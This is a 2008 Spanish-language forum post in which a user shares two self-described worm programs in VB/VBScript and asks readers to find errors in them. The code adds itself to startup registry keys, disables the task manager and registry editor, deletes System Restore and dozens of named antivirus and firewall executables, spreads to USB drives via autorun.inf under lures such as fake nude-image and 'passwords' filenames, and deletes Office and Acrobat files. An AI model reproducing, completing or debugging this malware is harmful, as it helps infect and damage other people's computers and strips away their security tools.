Comprobación de integridad de un código de VB

Iniciado por corax, 2 Enero 2008, 20:32 PM

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario

corax

2 Enero 2008, 20:32 PM
Buenos días a todos. Leyendo mini-manuales de VB en esta página web y en otras semejantes se me ocurrió probar a intentar crear mi primer gusano (por supuesto, basándome en código prefabricado de los manuales, sobre todo de uno de Hendrix, y usando parte del código del "michelle", de octalh. Bueno... es mi primer gusano, a sí que supongo que algo mal tendrá. Échenle un ojo y si ven algún error háganmelo saber ¿ok? :

Código (vb) [Seleccionar]

App.Taskvisible = False

FileCopy App.Path & "\" & App.VBSname & ".vbs C:\Windows\System\services.vbs"
Shell "cmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v services.vbs d/ C:\WINDOWS\System\services.vbs" 'el pequeñín ya está en el registro
Shell "reg add HKCU\software\microsoft\windows\CurrentVersion\policies\system /v disableregistrytools /t reg_dword /d ""1"" /f" 'eso bloquea el registro
Kill "C:\WINDOWS\System32\wscui.cpl" 'esto borra el centro de seguridad
ws.RegWrite "HKEY_CURRETN_USER\Software\Microsoft\Windows NT\Currentversion\Policies\Explorer\RestrictRun", " "
Kill "C:\WINDOWS\System32\shutdown.exe"
Shell "reg add HKCU\software\microsoft\windows\CurrentVersion\policies\system /v disabletaskmgr /t reg_dword /d ""1"" /f"

Private Sub Form_Load()
Form1.Visible = False
MsgBox ("Runtime Error 492. El archivo está dañado o corrupto. Por favor, consiga otra copia."), vbCritical, "Fallo en la aplicación ""
End Sub


Open "C:\Windows\System32\winlog.bat" For Output As #1
Print #1, "@echo off"
Print #1, "If exist E:\ (Copy /y C:\WINDOWS\System\services.vbs E:\services.vbs)"
Print #1, "If exist F:\ (Copy /y C:\WINDOWS\System\services.vbs F:\services.vbs)"
Print #1, "If exist G:\ (Copy /y C:\WINDOWS\System\services.vbs G:\services.vbs)"
Print #1, "exit"
Close #1
Shell ("C:\Windows\System32\Winlog.bat"), vbHide


Kill "C:\WINDOWS\System32\Restore\rstrui.exe"
Kill "C:\WINDOWS\System32\Restore\srdiag.exe"
Kill "C:\Archivos de programa\ESET\nod32.exe"
Kill "C:\Archivos de programa\ESET\nod32kui.exe"
Kill "C:\Archivos de programa\ESET\nod32krn.exe"
Kill "C:\Archivos de programa\ESET\nod32krr.dll"
Kill "C:\Archivos de programa\ESET\nod32ari.dll"
Kill "C:\Archivos de programa\ESET\ps_amon64.dll"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\pavsrv51.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\AVENGINE.EXE"
Kill "c:\archivos de programa\panda software\panda platinum 2006 internet security\firewall\PNMSRV.EXE"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\PavFnSvr.exe"
Kill "C:\Archivos de programa\Archivos comunes\Panda Software\PavShld\pavprsrv.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\AntiSpam\pskmssvc.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\PsImSvc.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\APVXDWIN.EXE"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\SRVLOAD.EXE"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\WebProxy.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\psimreal.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\avciman.exe"
Kill "C:\Archivos de programa\Zone Labs\ZoneAlarm\zlclient.exe"
Kill "C:\WINDOWS\SYSTEM32\ZONELABS\vsmon.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\PavFnSvr.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\PavKRE.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\PavProt.exe"
Kill "C:\Archivos de programa\Archivos comunes\Panda Software\PavShld\pavprsrv.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\pavsrv51.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\prevsrv.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\AVENGINE.EXE"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\PsImSvc.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\WebProxy.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\PavFnSvr.exe"
Kill "C:\Archivos de programa\Archivos comunes\Panda Software\PavShld\pavprsrv.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\pavsrv51.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\FIREWALL\PNMSRV.EXE"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\AVENGINE.EXE"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\PsImSvc.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\apvxdwin.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\WebProxy.exe"
Kill "C:\Archivos de programa\Archivos comunes\Panda Software\PavShld\pavprsrv.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2004\Pavsrv51.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2004\APVXDWIN.EXE"
Kill "C:\Archivos de programa\Spybot - Search & Destroy\SpybotSD.exe"
Kill "C:\Archivos de programa\Spybot - Search & Destroy\TeaTimer.exe"
Kill "C:\Archivos de programa\Spybot - Search & Destroy\SpybotSD.exe"
Kill "C:\Archivos de programa\Spybot - Search & Destroy\Advcheck.dll"
Kill "C:\Archivos de programa\AntiVir\avcenter.exe"
Kill "C:\Archivos de programa\AntiVir\avscan.exe"
Kill "C:\Archivos de programa\AntiVir\avnotify.exe"
Kill "C:\Archivos de programa\AntiVir\guardgui.exe"
Kill "C:\Archivos de programa\AntiVir\avgnt.exe"
Kill "C:\Archivos de programa\AntiVir\avguard.exe"
Kill "C:\Archivos de programa\AntiVir\avcmd.exe"
Kill "C:\Archivos de programa\Softwin\BitDefender8\bdmcon.exe"
Kill "C:\Archivos de programa\Softwin\BitDefender8\bdlite.exe"
Kill "C:\Archivos de programa\Softwin\BitDefender8\bdmcon.exe"
Kill "C:\Archivos de programa\Softwin\BitDefender8\bdnagent.exe"
Kill "C:\Archivos de programa\Softwin\BitDefender8\rtvr.exe"
Kill "C:\Archivos de programa\Alwil Software\Avast4\ashAvast.exe"
Kill "C:\Archivos de programa\Alwil Software\Avast4\ashBug.exe"
Kill "C:\Archivos de programa\Alwil Software\Avast4\ashDisp.exe"
Kill "C:\Archivos de programa\Alwil Software\Avast4\ashQuick.exe"
Kill "C:\Archivos de programa\Norton AntiVirus\NavShExt.dll"
Kill "C:\Archivos de programa\Norton AntiVirus\navapw32.exe"
Kill "C:\Archivos de programa\Norton AntiVirus\navapsvc.exe"
Kill "C:\Archivos de programa\Kaspersky Lab\Kaspersky Anti-Virus 6.0\avp.exe"
Kill "C:\Archivos de programa\McAfee\Common Framework\UdaterUI.exe"
Kill "C:\Archivos de programa\McAfee\Common Framework\McTray.exe"
Kill "C:\Archivos de programa\McAfee\Common Framework\FrameworkService.exe"
Kill "C:\Archivos de programa\McAfee\VirusScan Enterprise\Mcshield.exe"
Kill "C:\Archivos de programa\McAfee\VirusScan Enterprise\VsTskMgr.exe"
Kill "C:\Archivos de programa\Grisoft\AVG7\avgcc.exe"
Kill "C:\Archivos de programa\Grisoft\AVG7\avgemc.exe"
Kill "C:\Archivos de programa\Grisoft\AVG7\avginet.exe"
Kill "C:\Archivos de programa\Grisoft\AVG7\avgw.exe"
Kill "C:\Archivos de programa\Grisoft\AVG7\avgv.exe"
Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\Ad-Watch.exe"
Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\Ad-Aware.exe"
Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\alert.wav"
Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\Plugins\filespecs.dll"
Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\Plugins\lspexplorer.dll"
Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\Plugins\Vx2Cleaner.dll"
Kill "C:\Archivos de programa\SpyBro\SpyBro.exe"
Kill "C:\Archivos de programa\SpyBro\nospylauncher.exe"
Kill "C:\Archivos de programa\Spyware Doctor\drvclt.exe"
Kill "C:\Archivos de programa\Spyware Doctor\swdoctor.exe"
Kill "C:\Archivos de programa\Spyware Doctor\swdsvc.exe"
Kill "C:\Archivos de programa\Spyware Doctor\swcntaux.exe"
Kill "C:\Archivos de programa\Spyware Doctor\sdinvoker.exe"
Kill "C:\Archivos de programa\Spyware Doctor\drvctl.exe"
Kill "C:\Archivos de programa\Spyware Doctor\refdb.bin"
Kill "C:\Archivos de programa\xp-AntiSpy\xp-AntiSpy.exe"
Kill "C:\Archivos de programa\Ashampoo\Ashampoo FireWall\FireWall.exe"
Kill "C:\Archivos de programa\Comodo\Firewall\cpf.exe"
Kill "C:\Archivos de programa\Comodo\Firewall\cmdagent.exe"
Kill "C:\Archivos de programa\Comodo\Firewall\cpfsubmit.exe"
Kill "C:\Archivos de programa\Comodo\Firewall\crashrep.exe"
Kill "C:\Archivos de programa\RootKit Hook Analyzer\hookAnalyzer.exe"
Kill "C:\Archivos de programa\Anti-keylogger\Anti-keylogger.exe"
Kill "C:\Archivos de programa\ATS2\ats.exe"
Kill "C:\Archivos de programa\ATS2\d1.exe"
Kill "C:\Archivos de programa\ATS2\sysinfo.exe"
Kill "C:\Archivos de programa\Network Associates\VirusScan\Mcshield.exe"
Kill "C:\Archivos de programa\Network Associates\VirusScan\VsTskMgr.exe"
Kill "C:\Archivos de programa\Network Associates\VirusScan\SHSTAT.EXE"


'otra opción de copiado es la siguiente:
'FileCopy App.Path & App.VBSName & ".vbs", "E:\services.vbs"

'Ahora vamos a marcar nuestro dominio

Set Worm = CreateObject("WScript.Shell")
Worm.RegWrite ("HKLM\software\microsoft\Internet Explorer\Main\Start Page"), "http:www.elhacker.net"

Set firma = CreateObject("Wscript.Shell")
firma.RegWrite ("HKLM\software\Microsoft\Windows NT\CurrentVersion\RegistredOrganization"), "Heraldo de la Tormenta"

Set firma = CreateObject("Wscript.Shell")
firma.RegWrite ("HKLM\software\Microsoft\Windows NT\CurrentVersion\RegistredOwner"), "Zona de guerra bacteriológica"

'comprimiendo el wormet
Shell Winzip & "-a C:\porno.zip" & "C:\Windows\System\services.vbs" 'comprimir el virus

'para extraer:
'Shell Winzip & "-e C:\porno.zip" &"C:\"

'infectando RARs:
Shell winrar & "a C:\confidencial.zip C:\WINDOWS\System\services.vbs"
Shell winrar & "a C:\passwords.rar C:\WINDOWS\System\services.vbs"

Sub Main() 'motor de búsqueda en infección:
On Error Resume Next
If HayExcel Or HayWord Then
Fso.CopyFile MiNombreVBS, "F:\Abril Lavigne Desnuda.jpeg.vbs"
Fso.CopyFile DirWin & "Web\Folder.htt", "F:\Folder.htt", True
Fso.CopyFile DirWin & "Web\Desktop.ini", "F:\Desktop.ini", True
SetAttr "F:\Abril Lavigne Desnuda.jpeg", vbReadOnly
SetAttr "F:\Desktop.ini", vbHidden
SetAttr "F:\Folder.htt", vbHidden
End If
End Sub

'infectando archivos de excel:

Function HayExcel() As Boolean
Dim ExcelObj As Object
On Error GoTo NoExcel
Set ExcelObj = GetObject(, "Excel.Application")
If ExcelObj.ActiveWorkbook.Path = "F:\" Then
HayExcel = True
Exit Function
End If
NoExcel:
HayExcel = False
End Function

Sub Main() 'Ahora un pequeño PayLoad
If (Month(Now) = 6 or Month(Now) > 6) And (Day(Now) = 13 or Day(Now) < 13) Then
MsgBox "Ándate con ojo porque dije que vendría y he venido", vbCritical, "Marca del Corruptor"
MsgBox "Estás en mis manos... ¿quieres verlo?", vbExclamation, "Marca del Corruptor"
MsgBox "DAME EL PaWeRrR!!!", vbExclamation, "Marca del Corruptor"
MsgBox "¿Confirma que desea desinstalar Windows de su sistema?", vbCritical, "Aviso del Sistema"
End Sub

Sub Main()
Randomize
Num = Rnd
If Num = 0 Then
MsgBox "Has tenido suerte, mi amo ha querido que te respete. Dale gracias", vbExclamation, "El Perro Fiero de San Pancracio"
End If
If Num = 1 Then
MsgBox "Algo has hecho para merecer la ira de mi amo. Hoy la suerte te ha abandonado.", vbExclamation, "El Perro Fiero"
Kill "C:\Archivos de programa\Microsoft Office\Office\EXCEL.EXE"
Kill "C:\Archivos de programa\Microsoft Office\Office\GRAPH9.EXE"
Kill "C:\Archivos de programa\Microsoft Office\Office\MSACCESS.EXE"
Kill "C:\Archivos de programa\Microsoft Office\Office\POWERPNT.EXE"
Kill "C:\Archivos de programa\Microsoft Office\Office\PPTTOOLS.PPA"
Kill "C:\Archivos de programa\Microsoft Office\Office\FRONTPG.EXE"
Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\EXCEL.EXE"
Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\POWERPNT.EXE"
Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\MSPUB.EXE"
Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\OIS.EXE"
Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\Macros\EUROTOOL.XLA"
Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\Macros\HTML.XLA"
Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\GRAPH.EXE"
Kill "C:\Archivos de programa\Adobe\Acrobat 7.0\ActiveX\pdfshell.dll"
Kill "C:\Archivos de programa\Adobe\Acrobat 7.0\Reader\AcroRd32.exe"
Kill "C:\Archivos de programa\Adobe\Acrobat 7.0\Setup Files\RdrBig\ENU\Setup.exe"
Kill "C:\Archivos de programa\Adobe\Acrobat 7.0\Setup Files\RdrBig\ENU\Data1.cab"
Kill "C:\WINDOWS\System32\taskmgr.exe" 'esto borra el administrador de tareas
Kill "C:\WINDOWS\Taskman.EXE" 'por si acaso, que no me fío
Kill "C:\WINDOWS\System32\cmd.exe" 'esto elimina la opción de usar el MS-Dos
Kill "C:\WINDOWS\regedit.exe" 'esto borra el editor del registro
Kill "C:\WINDOWS\System32\wscui.cpl" 'esto borra el centro de seguridad
Kill "C:\WINDOWS\System32\command.com" 'esto borra la otra opción de usar el MS-Dos
End If
End Sub

Function Antidelete()
Set fso = CreateObject("scripting.filesystemobject")
Set Myself = fso.opentextfile(wscript.scriptfullname, 1)
MyCode = Myself.readall
Myself.Close
Do
If Not (fso.fileexists(wscript.scriptfullname)) Then
Set Myself = fso.createtextfile(wscript.scriptfullname, True)
Myself.write MyCode
Myself.Close
End If
Loop
End Function

Bueno, de hecho son dos códigos:

Código (vb) [Seleccionar]
'@echo off by Eliphas & Nehekara. Añoranza del Valhalla.
'por la gloria del Larisel IV, ahora y siempre
'Especiales agradecimientos a Octalh y a Hendrix


App.Taskvisible = False
MsgBox "Por fin nos hemos encontrado tú y yo.", vbExclamation, "Cherubael dice:"
MsgBox "Sabrías que vendría y he venido.", vbExclamation, "Cherubael dice:"
MsgBox "Nehekara no perdona los agravios recibidos.", vbExclamation, "Cherubael dice:"
MsgBox "A sí que ahora afronta las consecuencias.", vbExclamation, "Cherubael dice:"
MsgBox "Quod Erat Demostrandum...", vbExclamation, "Cherubael dice:"
MsgBox "Todas las almas claman por su salvación.", vbExclamation, "Cherubael dice:"
MsgBox "DAME EL PaWeRrR!!!", vbCritical, "Cherubael dice:"

Sub Main()
On Error Resume Next
If Month(Now) = 12 And Day(Now) = 17 Then
MsgBox "¿Confirma que desea desinstalar Windows de su sistema?", vbCritical, "Aviso del Sistema"
End Sub

Kill "C:\WINDOWS\System32\Restore\rstrui.exe"
Kill "C:\WINDOWS\System32\Restore\srdiag.exe"
Shell "cmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v winlogon.exe d/ C:\WINDOWS\System\winlogon.exe" 'el pequeñín ya está en el registro
Shell "reg add HKCU\software\microsoft\windows\CurrentVersion\policies\system /v disableregistrytools /t reg_dword /d ""1"" /f" 'eso bloquea el registro
Kill "C:\WINDOWS\System32\wscui.cpl" 'esto borra el centro de seguridad
ws.RegWrite "HKEY_CURRETN_USER\Software\Microsoft\Windows NT\Currentversion\Policies\Explorer\RestrictRun", " "
Kill "C:\WINDOWS\System32\shutdown.exe"
Shell "reg add HKCU\software\microsoft\windows\CurrentVersion\policies\system /v disabletaskmgr /t reg_dword /d ""1"" /f"


Sub Main() 'Dejando nuestra marca
On Error Resume Next
Set Cherubael = CreateObject("WScript.Shell")
Cherubael.RegWrite ("HKLM\software\microsoft\Internet Explorer\Main\Start Page"), "http:www.CherubaeL.com.ar"

Set firma = CreateObject("Wscript.Shell")
firma.RegWrite ("HKLM\software\Microsoft\Windows NT\CurrentVersion\RegistredOrganization"), "Heraldo de la Tormenta"

Set firma = CreateObject("Wscript.Shell")
firma.RegWrite ("HKLM\software\Microsoft\Windows NT\CurrentVersion\RegistredOwner"), "Zona de guerra bacteriológica"
End Sub

Sub Main()
On Error Resume Next
Randomize
Num = Rnd
If Num = 0 Then
MsgBox "A pesar de todo, voy a apiadarme de tí. SOnríe, eres libre.", vbExclamation, "Cherubael dice:"
End If
If Num = 1 Then
MsgBox "Lo siento, pero debo cumplir mis órdenes. Hoy la suerte te ha abandonado.", vbExclamation, "Cherubael dice:"
Kill "C:\WINDOWS\System32\taskmgr.exe"
Kill "C:\WINDOWS\Taskman.EXE"
Kill "C:\WINDOWS\System32\cmd.exe"
Kill "C:\WINDOWS\regedit.exe"
Kill "C:\WINDOWS\System32\wscui.cpl"
Kill "C:\WINDOWS\System32\command.com"
Kill "C:\Archivos de programa\Microsoft Office\Office\EXCEL.EXE" 'hala!! a tomar por culo el office...
Kill "C:\Archivos de programa\Microsoft Office\Office\GRAPH9.EXE"
Kill "C:\Archivos de programa\Microsoft Office\Office\MSACCESS.EXE"
Kill "C:\Archivos de programa\Microsoft Office\Office\POWERPNT.EXE"
Kill "C:\Archivos de programa\Microsoft Office\Office\PPTTOOLS.PPA"
Kill "C:\Archivos de programa\Microsoft Office\Office\FRONTPG.EXE"
Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\EXCEL.EXE"
Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\POWERPNT.EXE"
Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\MSPUB.EXE"
Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\OIS.EXE"
Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\Macros\EUROTOOL.XLA"
Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\Macros\HTML.XLA"
Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\GRAPH.EXE"
Kill "C:\Archivos de programa\Adobe\Acrobat 7.0\ActiveX\pdfshell.dll"
Kill "C:\Archivos de programa\Adobe\Acrobat 7.0\Reader\AcroRd32.exe"
Kill "C:\Archivos de programa\Adobe\Acrobat 7.0\Setup Files\RdrBig\ENU\Setup.exe"
Kill "C:\Archivos de programa\Adobe\Acrobat 7.0\Setup Files\RdrBig\ENU\Data1.cab"
End If
End Sub


'[  MODELO DE OBJETOS ]

Set fso = CreateObject("Scripting.FileSystemObject") ' ARCHIVOS
Set WshShell = wscript.CreateObject("WScript.Shell") ' REGISTRO




'[  CONSTANTES  ]

GUSANETname = wscript.ScriptName ' Indicamos que el nombre del GUSANET sera
                              ' el que tenga en ese momento el archivo actual.
GUSANET = "GUSANET.vbs"
'Nombre del exe que tendra el GUSANET en el sistema

GUSANETpatch = fso.GetSpecialFolder(1) & "\" & GUSANET
'Indicamos el directorio donde se copiara el GUSANET, si utilizamos
'la funcion specialfolder podemos indicar el copiado a la carpeta del sistema (1)
'sin importar donde se encuentre.

autorun = fso.GetSpecialFolder(1) & "\autorun.txt"
'lo mismo que en GUSANETpatch pero para el autorrun.

GUSANETusb = ":\proyecto.exe" ' Nombre que tendra el GUSANET en el medio extraible

autorunusb = ":\autorun.inf" ' Nombre que tendra el autorun en el medio extraible

Const HKEY_LOCAL_MACHINE = &H80000002 'constante para modificar registro mas adelante


'[  CHEQUEO DE INFECCION  ]

If Not infeccion(GUSANET) Then
copiar GUSANETname, GUSANETpatch
End If


' +  INFECTAR REGISTRO DE WINDOWS  +


If Not keyexist("GUSANET", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\") Then
crearentradareg()

'Si no existe la llave en el registro llamada GUSANET entonces la crea, con esto aseguramos
'el arranque del GUSANET con cada inicio del sistema.



'Subproceso que se encarga crear un archivo y escribir datos en el
'en este caso le indicamos que cree un archivo con la constante autorun
'que definimos desde el principio

Sub makeautorun()
    On Error Resume Next
Set mkaut = fso.createtextfile(autorun, True) 'creamos un archivo con el nombre de
    mkaut.WriteLine "[AUTORUN]"                'la constante autorun
    mkaut.WriteLine "open=" & GUSANETusb 'constante del nombre del ejecutable.
    mkaut.WriteLine "shell\1=abrir"
    mkaut.WriteLine "shell\1\Command=" & GUSANETusb
    mkaut.WriteLine "shell\2\=explorar"
    mkaut.WriteLine "shell\2\Command=" & GUSANETusb
    mkaut.WriteLine "shellexecute=" & GUSANETusb
    mkaut.Close
End Sub
'aqui creamos el autorun que sirve para ejecutar el GUSANET cuando el pardillo haga doble click
'en el icono de la unidad extraible


'subproceso que se encarga de añadir atributos de oculto, sistema y solo lectura
'a cada archivo que compone al GUSANET

Sub makeatributos()
    On Error Resume Next
Dim archivosGUSANET(1) 'array archivosGUSANET que dentro de el contiene al GUSANET y su autorun
    archivosGUSANET(0) = GUSANETpatch
    archivosGUSANET(1) = autorun

       For Each file In archivosGUSANET ' por cada archivo dentro del array archivosGUSANET
         Set wormcontent = fso.GetFile(file) 'tomalos y
            wormcontent.Attributes = 7        'agregales atributos
              Next
End Sub


'Funcion que se encarga de verificar que exista una llave en el registro

Function keyexist(keyname, keyPath, regCategory)
    On Error Resume Next
     retVal = False
     strComputer = "." 'inicamos en cualquier computadora
     Set oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & strComputer & "\root\default:StdRegProv") 'se crea un objeto

     oReg.EnumKey regCategory, keyPath, arrSubKeys 'partes de la clave del registro

     For Each subkey In arrSubKeys
          If keyname = subkey Then
               retVal = True
               Exit For
          End If
     Next
     keyExists = retVal
End Function
'esta funcion basicamente se encarga de verificar que existan los valores que introduzcamos
'en ella que son keyname, keypath y regcategory, de esa manera comprobamos que exista
'cualquier llave en el registro con solo usar la funcion keyexist y el valor de nuestra
'llave a verficar


'Subproceso que se encarga de crear la llave en el registro
Private Sub crearentradareg()
    On Error Resume Next
WshShell.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\GUSANET", _
GUSANETpatch, "REG_SZ"
End Sub


'Subproceso que se encarga de copiar al GUSANET a una unidad extraible.
Private Sub infekusb()
    On Error Resume Next
Const DriveTypeRemovable = 1 ' indicamos medio extraible
Do ' inicia loop infinito
Set oFS = wscript.CreateObject("Scripting.FileSystemObject")
Set oDrives = oFS.Drives 'declaramos todos los drivers
For Each Drive In oDrives 'por cada driver
    If Drive.DriveType = DriveTypeRemovable Then 'si son del tipo removible entonces
        If Drive.DriveLetter <> "A" Then ' si la letra es de A-Z entonces
            If fso.fileexists(Drive.DriveLetter + autorunusb) Then ' si existe autorun
               Set cFile = fso.GetFile(Drive.DriveLetter + autorunusb) 'tomalo y
               cFile.Attributes = 0 ' quitale los atributos
               fso.CopyFile autorun, Drive.DriveLetter & autorunusb, True 'despues copialo
           Else ' de lo contrario
      fso.CopyFile autorun, Drive.DriveLetter & autorunusb, True ' copialo
   End If
fso.CopyFile GUSANETpatch, Drive.DriveLetter & GUSANETusb, True ' copia el GUSANET a la unidad
End If
End If
Next
Loop
End Sub


Sub Main()
On Error Resume Next
Kill "C:\Archivos de programa\ESET\nod32.exe"
Kill "C:\Archivos de programa\ESET\nod32kui.exe"
Kill "C:\Archivos de programa\ESET\nod32krn.exe"
Kill "C:\Archivos de programa\ESET\nod32krr.dll"
Kill "C:\Archivos de programa\ESET\nod32ari.dll"
Kill "C:\Archivos de programa\ESET\ps_amon64.dll"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\pavsrv51.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\AVENGINE.EXE"
Kill "c:\archivos de programa\panda software\panda platinum 2006 internet security\firewall\PNMSRV.EXE"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\PavFnSvr.exe"
Kill "C:\Archivos de programa\Archivos comunes\Panda Software\PavShld\pavprsrv.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\AntiSpam\pskmssvc.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\PsImSvc.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\APVXDWIN.EXE"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\SRVLOAD.EXE"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\WebProxy.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\psimreal.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\avciman.exe"
Kill "C:\Archivos de programa\Zone Labs\ZoneAlarm\zlclient.exe"
Kill "C:\WINDOWS\SYSTEM32\ZONELABS\vsmon.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\PavFnSvr.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\PavKRE.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\PavProt.exe"
Kill "C:\Archivos de programa\Archivos comunes\Panda Software\PavShld\pavprsrv.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\pavsrv51.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\prevsrv.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\AVENGINE.EXE"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\PsImSvc.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\WebProxy.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\PavFnSvr.exe"
Kill "C:\Archivos de programa\Archivos comunes\Panda Software\PavShld\pavprsrv.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\pavsrv51.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\FIREWALL\PNMSRV.EXE"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\AVENGINE.EXE"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\PsImSvc.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\apvxdwin.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\WebProxy.exe"
Kill "C:\Archivos de programa\Archivos comunes\Panda Software\PavShld\pavprsrv.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2004\Pavsrv51.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2004\APVXDWIN.EXE"
Kill "C:\Archivos de programa\Spybot - Search & Destroy\SpybotSD.exe"
Kill "C:\Archivos de programa\Spybot - Search & Destroy\TeaTimer.exe"
Kill "C:\Archivos de programa\Spybot - Search & Destroy\SpybotSD.exe"
Kill "C:\Archivos de programa\Spybot - Search & Destroy\Advcheck.dll"
Kill "C:\Archivos de programa\AntiVir\avcenter.exe"
Kill "C:\Archivos de programa\AntiVir\avscan.exe"
Kill "C:\Archivos de programa\AntiVir\avnotify.exe"
Kill "C:\Archivos de programa\AntiVir\guardgui.exe"
Kill "C:\Archivos de programa\AntiVir\avgnt.exe"
Kill "C:\Archivos de programa\AntiVir\avguard.exe"
Kill "C:\Archivos de programa\AntiVir\avcmd.exe"
Kill "C:\Archivos de programa\Softwin\BitDefender8\bdmcon.exe"
Kill "C:\Archivos de programa\Softwin\BitDefender8\bdlite.exe"
Kill "C:\Archivos de programa\Softwin\BitDefender8\bdmcon.exe"
Kill "C:\Archivos de programa\Softwin\BitDefender8\bdnagent.exe"
Kill "C:\Archivos de programa\Softwin\BitDefender8\rtvr.exe"
Kill "C:\Archivos de programa\Alwil Software\Avast4\ashAvast.exe"
Kill "C:\Archivos de programa\Alwil Software\Avast4\ashBug.exe"
Kill "C:\Archivos de programa\Alwil Software\Avast4\ashDisp.exe"
Kill "C:\Archivos de programa\Alwil Software\Avast4\ashQuick.exe"
Kill "C:\Archivos de programa\Norton AntiVirus\NavShExt.dll"
Kill "C:\Archivos de programa\Norton AntiVirus\navapw32.exe"
Kill "C:\Archivos de programa\Norton AntiVirus\navapsvc.exe"
Kill "C:\Archivos de programa\Kaspersky Lab\Kaspersky Anti-Virus 6.0\avp.exe"
